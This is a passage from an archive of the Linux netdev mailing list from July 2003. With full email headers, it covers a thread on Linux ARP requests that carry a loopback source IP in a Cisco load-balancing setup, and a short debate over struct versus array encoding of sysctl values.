The userspace code for this is in the CVS at the mentioned site, I haven't made a new release yet due to lack of time. cheers, Bart From carlosev@newipnet.com Thu Jul 24 03:46:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 03:46:25 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OAkIFl000849 for ; Thu, 24 Jul 2003 03:46:19 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 45990207B3; Thu, 24 Jul 2003 12:46:17 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 935BC20775; Thu, 24 Jul 2003 12:46:06 +0200 (CEST) Message-ID: <200307241238510034.210E4F24@192.168.128.16> In-Reply-To: <200307241130.53262.bdschuym@pandora.be> References: <200307240134030339.1EADABD4@192.168.128.16> <200307241130.53262.bdschuym@pandora.be> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 12:38:51 +0200 From: "Carlos Velasco" To: "Bart De Schuymer" , "Julian Anastasov" Cc: netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OAkIFl000849 X-archive-position: 4283 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 11:30 Bart De Schuymer wrote: >arptables can mangle the arp payload with the "mangle" module. You'll need >a >very recent kernel for this, net/ipv4/netfilter/arpt_mangle.c must exist. >The >userspace code for this is in the CVS at the mentioned site, I haven't >made a >new release yet due to lack of time. Thanks Bart, However I don't see how these tools can help in this ARP problem. 
There is no need of filtering or mangling arp, the problem is an incorrect arp being sent. Regards, Carlos Velasco From ja@ssi.bg Thu Jul 24 04:05:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 04:05:44 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OB5LFl009918 for ; Thu, 24 Jul 2003 04:05:23 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6OB4Hj06998; Thu, 24 Jul 2003 14:04:17 +0300 Date: Thu, 24 Jul 2003 14:04:17 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: Carlos Velasco cc: Bart De Schuymer , Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307241238510034.210E4F24@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4284 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Thu, 24 Jul 2003, Carlos Velasco wrote: > On 24/07/2003 at 11:30 Bart De Schuymer wrote: > > However I don't see how these tools can help in this ARP problem. > There is no need of filtering or mangling arp, the problem is an incorrect arp being sent. The src IP in the ARP probe is a hint. In most of the cases it is ignored. But the receiver has the right to answer based on it. You know, the reply is sent to the sender's hwaddr, not to the src IP. Also, Linux always replies if the remote host asks for IP configured on loopback interface. So, there is no problem. If the remote system has your patch, there is also no problem. What kind of problems do you see except the loopback IP as sender IP? Dropped probes? Unanswered probes? 
> Regards,
> Carlos Velasco

Regards

--
Julian Anastasov

From kuznet@ms2.inr.ac.ru Thu Jul 24 07:02:59 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 07:03:08 -0700 (PDT)
Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OE2vFl030469 for ; Thu, 24 Jul 2003 07:02:59 -0700
Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA09143; Thu, 24 Jul 2003 18:02:35 +0400
From: kuznet@ms2.inr.ac.ru
Message-Id: <200307241402.SAA09143@dub.inr.ac.ru>
Subject: Re: O/M flags against 2.6.0-test1
To: davem@redhat.com (David S. Miller)
Date: Thu, 24 Jul 2003 18:02:35 +0400 (MSD)
Cc: krkumar@us.ibm.com, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com
In-Reply-To: <20030724000705.4662df54.davem@redhat.com> from "David S. Miller" at Jul 24, 2003 12:07:05
X-Mailer: ELM [version 2.5 PL6]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 4285
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: kuznet@ms2.inr.ac.ru
Precedence: bulk
X-list: netdev

Hello!

> Another idea is to define the user structure:

Actually, I saw it just as array indexed by values from sysctl.h.

Maybe, struct is better, but I am inclined to think in this case it is wrong.
It is going to be extended, so newly compiled applications will see
truncated structs from older kernels and will have to do ugly job
verifying validity of fields using some offsetof. In the case of array
it is natural at least.

Alexey

PS I know right way is not to change the struct. :-) It is another reason why
I am still not sure that encoding sysctl values as separate subattributes
is bad idea.
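
To make the struct-versus-array trade-off above concrete, here is a small sketch of how a newly compiled application might read a configuration blob from an older kernel that knows fewer fields. All names (conf_v2, struct_field_valid, array_get, the IDX_* constants) and the three-field layout are hypothetical, chosen only for illustration. With a struct, every field needs its own offsetof-based length check; with an array indexed by sysctl-style constants, one generic bound check on the index is enough.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical "new" layout; an older kernel might fill only the first two. */
struct conf_v2 {
	int32_t forwarding;
	int32_t hop_limit;
	int32_t use_tempaddr;   /* assumed to be the newly added field */
};

/* Struct style: a field is valid only if the blob covers it completely. */
#define struct_field_valid(len, field) \
	((len) >= offsetof(struct conf_v2, field) + \
		  sizeof(((struct conf_v2 *)0)->field))

/* Hypothetical indices, standing in for the constants from sysctl.h. */
enum { IDX_FORWARDING, IDX_HOP_LIMIT, IDX_USE_TEMPADDR };

/* Array style: one bound check; returns 0 on success, -1 if absent. */
static int array_get(const void *blob, size_t len, unsigned int idx,
		     int32_t *out)
{
	if (((size_t)idx + 1) * sizeof(int32_t) > len)
		return -1;
	memcpy(out, (const char *)blob + idx * sizeof(int32_t), sizeof(*out));
	return 0;
}
```

A printing loop over the array form only needs the blob length to know where to stop, whereas the struct form needs one struct_field_valid() test per member.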
From yoshfuji@linux-ipv6.org Thu Jul 24 07:24:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 07:24:49 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OEOfFl032650 for ; Thu, 24 Jul 2003 07:24:42 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6OEQMBo020867; Thu, 24 Jul 2003 23:26:22 +0900 Date: Thu, 24 Jul 2003 10:26:21 -0400 (EDT) Message-Id: <20030724.102621.89190471.yoshfuji@linux-ipv6.org> To: kuznet@ms2.inr.ac.ru Cc: davem@redhat.com, krkumar@us.ibm.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: O/M flags against 2.6.0-test1 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <200307241402.SAA09143@dub.inr.ac.ru> References: <20030724000705.4662df54.davem@redhat.com> <200307241402.SAA09143@dub.inr.ac.ru> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4286 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <200307241402.SAA09143@dub.inr.ac.ru> (at Thu, 24 Jul 2003 18:02:35 +0400 (MSD)), kuznet@ms2.inr.ac.ru says: > Maybe, struct is better, but I am inclined to think in this case it is wrong. 
> It is going to be extended, so newly compiled applications will see
> truncated structs from older kernels and will have to do ugly job
> verifying validity of fields using some offsetof. In the case of array
> it is natural at least.

I'm not so sure about the "array," but anyway,
I don't think it is so ugly to use struct / offsetof.

--yoshfuji

From kuznet@ms2.inr.ac.ru Thu Jul 24 07:44:03 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 07:44:06 -0700 (PDT)
Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OEi2Fl008825 for ; Thu, 24 Jul 2003 07:44:03 -0700
Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA09525; Thu, 24 Jul 2003 18:43:45 +0400
From: kuznet@ms2.inr.ac.ru
Message-Id: <200307241443.SAA09525@dub.inr.ac.ru>
Subject: Re: O/M flags against 2.6.0-test1
To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=)
Date: Thu, 24 Jul 2003 18:43:44 +0400 (MSD)
Cc: davem@redhat.com, krkumar@us.ibm.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org
In-Reply-To: <20030724.102621.89190471.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at Jul 24, 2003 10:26:21
X-Mailer: ELM [version 2.5 PL6]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 4287
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: kuznet@ms2.inr.ac.ru
Precedence: bulk
X-list: netdev

Hello!

> I'm not so sure about the "array," but anyway,
> I don't think it is so ugly to use struct / offsetof.

Just write a sample of code, printing all fields of struct and equivalent
array, and you will see.

Well, I just know, that when iproute will do this, it will cast the struct
to array in any case. It is dirty, but sane at least.
:-) Alexey From carlosev@newipnet.com Thu Jul 24 08:36:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 08:36:22 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OFa8Fl015955 for ; Thu, 24 Jul 2003 08:36:12 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 1BF2F20775; Thu, 24 Jul 2003 17:36:06 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id AAF75207B3; Thu, 24 Jul 2003 17:35:54 +0200 (CEST) Message-ID: <200307241728270476.0031BAB0@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 17:28:27 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OFa8Fl015955 X-archive-position: 4288 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 14:04 Julian Anastasov wrote: > The src IP in the ARP probe is a hint. In most of the >cases it is ignored. But the receiver has the right to answer >based on it. You know, the reply is sent to the sender's hwaddr, >not to the src IP. Also, Linux always replies if the remote host asks >for IP configured on loopback interface. So, there is no problem. >If the remote system has your patch, there is also no problem. >What kind of problems do you see except the loopback IP as sender >IP? Dropped probes? Unanswered probes? 
Julian,

The problem is more complicated than the simplified setup I built to describe the bug.

The real setup, and the reason for the lo interface, is that I'm using IOS Load Balancing in dispatched mode on a Cisco Catalyst 6500. This causes packets to be sent to a server farm of Linux boxes with, as destination IP, the address configured on the loopback interface of all the machines. On the ethernet interface every Linux box has a different IP address, and the balancing device sends the packets through any of these interfaces, choosing the "leastconnections" server. Thus, the load balancing device only changes the MAC address of the real packet on the fly, sending it to one of the real servers, where it is accepted because the destination IP is the loopback IP address on every Linux machine.

The problem comes when the packets go back to the balancing device: the servers send the ARP request with the loopback source IP address, and that causes the Cisco device not to reply to the ARP request. I have tried different IOS versions and Cisco devices; none of them replies to this ARP request.

Following what you stated in your last e-mail, I checked the RFC (if I'm not wrong it's rfc826) to see whether the source IP address needs to be correct when replying to an ARP request, and came across this:

"
?Is the opcode ares_op$REQUEST? (NOW look at the opcode!!)
Yes:
  Swap hardware and protocol fields, putting the local
  hardware and protocol addresses in the sender fields.
  Set the ar$op field to ares_op$REPLY
  Send the packet to the (new) target hardware address on
  the same hardware on which the request was received.
"

According to this, I think YOU ARE RIGHT and the source IP address should not be checked when replying to this ARP Request.

I have set up another test, forcing a Windows machine to be the default route of the Linux box, to see if Windows replied to this ARP request... and IT DID.

For now, I'm going to contact Cisco TAC and open a case to see if the bug is in Cisco IOS. I will keep you posted about this issue if you want.
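
The RFC 826 step quoted above can be sketched roughly as follows, assuming Ethernet/IPv4 ARP. The names struct arp_eth_ipv4 and arp_make_reply are hypothetical, and all fields are kept as raw network-order bytes so no byte swapping is needed. In this sketch the sender protocol address of the request is only copied into the target fields of the reply and is never validated, which is consistent with the reading that the source IP alone should not prevent an answer.

```c
#include <stdint.h>
#include <string.h>

#define ARP_OP_REQUEST 1
#define ARP_OP_REPLY   2

/* ARP payload for Ethernet + IPv4, fields as raw network-order bytes. */
struct arp_eth_ipv4 {
	uint8_t hrd[2], pro[2];   /* hardware / protocol type */
	uint8_t hln, pln;         /* address lengths: 6 and 4 */
	uint8_t op[2];            /* opcode */
	uint8_t sha[6], spa[4];   /* sender hardware / protocol address */
	uint8_t tha[6], tpa[4];   /* target hardware / protocol address */
};

/*
 * Turn a request addressed to us into a reply, in place.
 * Returns 1 if a reply was built, 0 if this is not a request for my_ip.
 */
static int arp_make_reply(struct arp_eth_ipv4 *p,
			  const uint8_t my_mac[6], const uint8_t my_ip[4])
{
	if (p->op[0] != 0 || p->op[1] != ARP_OP_REQUEST)
		return 0;
	if (memcmp(p->tpa, my_ip, 4) != 0)
		return 0;         /* not asking about our address */

	/* Swap: the requester's sender fields become the new target fields. */
	memcpy(p->tha, p->sha, 6);
	memcpy(p->tpa, p->spa, 4);
	/* Put the local hardware and protocol addresses in the sender fields. */
	memcpy(p->sha, my_mac, 6);
	memcpy(p->spa, my_ip, 4);
	p->op[1] = ARP_OP_REPLY;
	return 1;
}
```

The frame would then be sent to the new target hardware address, i.e. the MAC of the original requester, whatever source IP the request carried.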
Regards, Carlos Velasco From ja@ssi.bg Thu Jul 24 08:54:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 08:54:24 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OFsHFl017902 for ; Thu, 24 Jul 2003 08:54:19 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6OFs4j10456; Thu, 24 Jul 2003 18:54:04 +0300 Date: Thu, 24 Jul 2003 18:54:04 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: Carlos Velasco cc: Bart De Schuymer , Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307241728270476.0031BAB0@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4289 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Thu, 24 Jul 2003, Carlos Velasco wrote: > The problem is more complicated than the simplified setting I have builded for describing the bug: > Real setting and meaning of the lo interface is because I'm using IOS Load Balancing in dispatched mode on Cisco Catalyst 6500. > This cause packets being sent to a server farm of Linux boxes with destination IP the one configured on the loopback interface in all machines. > In the ethernet interface all Linux boxes have diferent IP address and the balancing device send the packets through any of these interfaces, choosing the "leastconnections" server. > Thus, the load balancing device only change the mac address of the real packet on the fly sending it to one of the real servers where it's accepted cause of destination IP is the loopback IP address on every Linux machine. > > Problem is when the packet go back to the balancing device, as they send ARP request with loopback source IP address, that cause Cisco device not to reply the ARP request. 
> I have tried different IOS and Cisco devices, no one reply this ARP request. I now see, it is the so called "ARP Problem" in the IPVS context, many real servers and one director sharing same virtual IP: http://www.linuxvirtualserver.org/ The most used feature for such setups: http://www.ssi.bg/~ja/#hidden > Regards, > Carlos Velasco Regards -- Julian Anastasov From davem@redhat.com Thu Jul 24 09:12:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:12:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGCmFl020044 for ; Thu, 24 Jul 2003 09:12:55 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id JAA13346; Thu, 24 Jul 2003 09:10:08 -0700 Date: Thu, 24 Jul 2003 09:10:07 -0700 From: "David S. Miller" To: Julian Anastasov Cc: carlosev@newipnet.com, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Message-Id: <20030724091007.68923845.davem@redhat.com> In-Reply-To: References: <200307241728270476.0031BAB0@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4290 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 18:54:04 +0300 (EEST) Julian Anastasov wrote: > The most used feature for such setups: > http://www.ssi.bg/~ja/#hidden The hidden patch is not necessary with current kernels and arpfilter. 
From carlosev@newipnet.com Thu Jul 24 09:15:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:15:47 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGFfFl020768 for ; Thu, 24 Jul 2003 09:15:41 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 9A59420775; Thu, 24 Jul 2003 18:15:39 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 4533B207B3; Thu, 24 Jul 2003 18:15:28 +0200 (CEST) Message-ID: <200307241804140253.00527C89@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 18:04:14 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OGFfFl020768 X-archive-position: 4291 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 18:54 Julian Anastasov wrote: > I now see, it is the so called "ARP Problem" in the IPVS >context, many real servers and one director sharing same virtual >IP: > >http://www.linuxvirtualserver.org/ > >The most used feature for such setups: >http://www.ssi.bg/~ja/#hidden Julian, This would be another approach, configuring the IP address on the ethernet interface (ex. eth0:2) and not advertising or replying arp with the hidden patch. However the usual approach is configuring the destination IP address on a loopback interface that does real "hiding" as it's no more in ethernet interface. 
Dispatched mode: http://www.cisco.com/en/US/products/sw/iosswrel/ps1833/products_feature_guide09186a0080086f2b.html#2728293 As long as I know, Solaris 8 and Windows 2000 have no problems with the ARP Request, as they use the src IP address of the ethernet interface. But as I have seen in the RFC it seems that Cisco devices should reply to this ARP request without looking into the source ip address. I will open a TAC case and see if they raise a bug. Regards, Carlos Velasco From ja@ssi.bg Thu Jul 24 09:33:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:33:22 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGXEFl023468 for ; Thu, 24 Jul 2003 09:33:16 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6OGWtj10808; Thu, 24 Jul 2003 19:32:55 +0300 Date: Thu, 24 Jul 2003 19:32:55 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: Carlos Velasco cc: Bart De Schuymer , Subject: Re: Bug? ARP with wrong src IP address In-Reply-To: <200307241804140253.00527C89@192.168.128.16> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4292 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Thu, 24 Jul 2003, Carlos Velasco wrote: > This would be another approach, configuring the IP address on the > ethernet interface (ex. eth0:2) and not advertising or replying arp with > the hidden patch. > However the usual approach is configuring the destination IP address on > a loopback interface that does real "hiding" as it's no more in ethernet > interface. The Linux concept differs. As for hidden, it works for different interface, not for the one where the probe is received. The alias names do not play here. 
> As long as I know, Solaris 8 and Windows 2000 have no problems with the > ARP Request, as they use the src IP address of the ethernet interface. > But as I have seen in the RFC it seems that Cisco devices should reply > to this ARP request without looking into the source ip address. There are some exceptions for the src IP. Even Linux will not reply if the src IP in incoming probe matches local IP. But may be only Linux preserves the src IP in outgoing probes. Regards -- Julian Anastasov From carlosev@newipnet.com Thu Jul 24 09:48:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 09:48:11 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OGm5Fl025240 for ; Thu, 24 Jul 2003 09:48:06 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 1CA6420775; Thu, 24 Jul 2003 18:48:03 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 44FBE207B3; Thu, 24 Jul 2003 18:47:54 +0200 (CEST) Message-ID: <200307241836060226.006FACEB@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 18:36:06 +0200 From: "Carlos Velasco" To: "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OGm5Fl025240 X-archive-position: 4293 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 19:32 Julian Anastasov wrote: > There are some exceptions for the src IP. Even Linux will >not reply if the src IP in incoming probe matches local IP. 
But >may be only Linux preserves the src IP in outgoing probes. I think so, I don't like that src IP in outgoing probes... but as Windows OS replies to this ARP can't see why Cisco IOS is not replying. Will open a TAC case tomorrow. I'm interested on testing this in Solaris. Regards, Carlos Velasco From carlosev@newipnet.com Thu Jul 24 11:22:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 11:22:13 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OIM2Fl012012 for ; Thu, 24 Jul 2003 11:22:03 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 6011920775; Thu, 24 Jul 2003 20:22:00 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 9776D207B4; Thu, 24 Jul 2003 20:21:48 +0200 (CEST) Message-ID: <200307242011420101.00BC642D@192.168.128.16> In-Reply-To: <200307241836060226.006FACEB@192.168.128.16> References: <200307241836060226.006FACEB@192.168.128.16> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Thu, 24 Jul 2003 20:11:42 +0200 From: "Carlos Velasco" To: "Carlos Velasco" , "Julian Anastasov" Cc: "Bart De Schuymer" , netdev@oss.sgi.com Subject: Re: Bug? ARP with wrong src IP address Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6OIM2Fl012012 X-archive-position: 4294 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 24/07/2003 at 18:36 Carlos Velasco wrote: >> There are some exceptions for the src IP. Even Linux will >>not reply if the src IP in incoming probe matches local IP. But >>may be only Linux preserves the src IP in outgoing probes. 
Tested these platforms: Solaris 8 -> sends src IP address of INTERFACE Cisco -> sends src IP address of INTERFACE Windows 2000, XP -> sends src IP address of INTERFACE Linux 2.6.0-pre1, 2.4.20, 2.4.21 -> sends src IP address of LOOPBACK Question: ¿What would be the implications of applying my patch or similar to do linux behave like other OS? >Will open a TAC case tomorrow. I'm interested on testing this in Solaris. Same tests: Solaris 8 -> replies the ARP request Windows 2000, XP -> replies the ARP request Linux 2.4.21 -> replies the ARP request Cisco -> NOT replies the ARP request I will contact Cisco to see why they don't do and if it can be fixed in future releases. Regards, Carlos Velasco From davem@redhat.com Thu Jul 24 11:40:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 24 Jul 2003 11:40:19 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6OIeEFl016803 for ; Thu, 24 Jul 2003 11:40:15 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id LAA13648; Thu, 24 Jul 2003 11:37:31 -0700 Date: Thu, 24 Jul 2003 11:37:31 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: carlosev@newipnet.com, ja@ssi.bg, bdschuym@pandora.be, netdev@oss.sgi.com Subject: Re: Bug? 
ARP with wrong src IP address Message-Id: <20030724113731.73e9bbf6.davem@redhat.com> In-Reply-To: <200307242011420101.00BC642D@192.168.128.16> References: <200307241836060226.006FACEB@192.168.128.16> <200307242011420101.00BC642D@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4295 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 24 Jul 2003 20:11:42 +0200 "Carlos Velasco" wrote: > Tested these platforms: > > Solaris 8 -> sends src IP address of INTERFACE > Cisco -> sends src IP address of INTERFACE > Windows 2000, XP -> sends src IP address of INTERFACE > Linux 2.6.0-pre1, 2.4.20, 2.4.21 -> sends src IP address of LOOPBACK > > Question: _What would be the implications of applying my patch or similar to do linux behave like other OS? You'll break things for people who depend upon the way Linux currently behaves. 
